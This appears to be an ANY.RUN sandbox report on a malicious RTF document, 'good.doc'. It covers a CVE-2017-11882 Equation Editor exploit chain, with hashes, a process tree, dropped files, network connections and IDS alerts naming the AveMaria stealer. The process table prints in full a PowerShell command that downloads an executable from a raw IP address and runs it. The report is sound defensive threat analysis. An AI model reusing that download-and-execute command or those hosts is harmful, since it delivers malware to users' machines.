analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

good.doc

Full analysis: https://app.any.run/tasks/fc9ec2d2-1c9e-4109-822a-438fb30a1b7b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 23, 2019, 10:57:32
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
opendir
loader
trojan
Indicators:
MIME: text/rtf
File info: Rich Text Format data, unknown version
MD5:

3B1D5DF7F2CC8B700E2DE1DD1621D6A6

SHA1:

D4AD202DD890EE961230A17BB3104E742542AE7E

SHA256:

0585136A327E688B798812CD7BEFC77278AE4B450D0BC2AA68EE8C4A134BABCE

SSDEEP:

96:I1PzOmvCPi9Q3Pr1bOMF1q1MQjgfm6L7wgDK5gweeKKH7PkTDf53HcAHv/dU:HmCq90z1bj1qyLYXgCKOS53cAHvC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 684)

    • Executes PowerShell scripts

      • cmd.exe (PID: 2716)

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 684)

    • Application was dropped or rewritten from another process

      • fdfsdfdssdfdfrwtwr4t.exe (PID: 3672)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3864)

    • Downloads executable files from IP

      • powershell.exe (PID: 3864)

  • SUSPICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 684)

    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 684)
      • powershell.exe (PID: 3864)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3988)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3864)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3012)

    • Reads internet explorer settings

      • mshta.exe (PID: 3988)

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3864)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs eqnedt32.exe mshta.exe no specs cmd.exe no specs powershell.exe fdfsdfdssdfdfrwtwr4t.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\good.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
684"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3988"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.hta" C:\Windows\System32\mshta.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2716"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/good.exe','%temp%\fdfsdfdssdfdfrwtwr4t.exe'); Start '%temp%\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3864powershell (new-object System.Net.WebClienT).DownloadFile('http://194.36.173.46/good.exe','C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'); Start 'C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3672"C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exe" C:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exepowershell.exe
User:
admin
Company:
Simon Tatham
Integrity Level:
MEDIUM
Description:
SSH, Telnet and Rlogin client
Version:
Release 0.64
Total events
1 620
Read events
1 481
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
2
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR93AB.tmp.cvr
MD5:
SHA256:
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MHV20XJWBYTOEFWAUQWZ.temp
MD5:
SHA256:
684EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\good[1].htahtml
MD5:1146E764A4C86839CB7AC46DCABB66D0
SHA256:08EE854AB6DA54E95FA82BE440060B475CC2A97912C422F185F552A5A826F1DC
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19a965.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\good.doc.LNKlnk
MD5:4BE10F6111A588C3AA071FBB0063DB81
SHA256:91AC419EE033BDC9DD6CA5C1EA151E898CB990EACCDC11D4A0E995C3E99EA071
3864powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:044CA4CFE54DE24BB55B7EEEEDFE1C31
SHA256:1A8F5678073FD8A2486AAC2FE27FD8A576A4E3079B6FA188F4734F2BDE5AEC5A
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:F3780CCEEEFC12CE66A2EDB00BEF10E8
SHA256:BB0307043C93563DC22EE53BC15E17BAB0980675BED9B0906C0502280112EBDA
3864powershell.exeC:\Users\admin\AppData\Local\Temp\fdfsdfdssdfdfrwtwr4t.exeexecutable
MD5:1F925C0BAFFA5BC170CB0B496D51627F
SHA256:4D4789956670F5B47155FC1D84408CB12FD050ABA125EC41F27729137B2D8244
684EQNEDT32.EXEC:\Users\admin\AppData\Roaming\jbkgvgviyufufuifyuf.htahtml
MD5:1146E764A4C86839CB7AC46DCABB66D0
SHA256:08EE854AB6DA54E95FA82BE440060B475CC2A97912C422F185F552A5A826F1DC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3864
powershell.exe
GET
200
194.36.173.46:80
http://194.36.173.46/good.exe
unknown
executable
121 Kb
malicious
684
EQNEDT32.EXE
GET
200
194.36.173.46:80
http://194.36.173.46/good.hta
unknown
html
1.12 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
684
EQNEDT32.EXE
194.36.173.46:80
malicious
23.249.161.11:5200
ColoCrossing
US
malicious
3864
powershell.exe
194.36.173.46:80
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
684
EQNEDT32.EXE
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTA application download
684
EQNEDT32.EXE
Potentially Bad Traffic
ET POLICY Possible HTA Application Download
684
EQNEDT32.EXE
Attempted User Privilege Gain
ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl
3864
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
3864
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3864
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3864
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3864
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
A Network Trojan was detected
MALWARE [PTsecurity] Stealer.Win32.AveMaria
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Fuerboos Win32
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
good.doc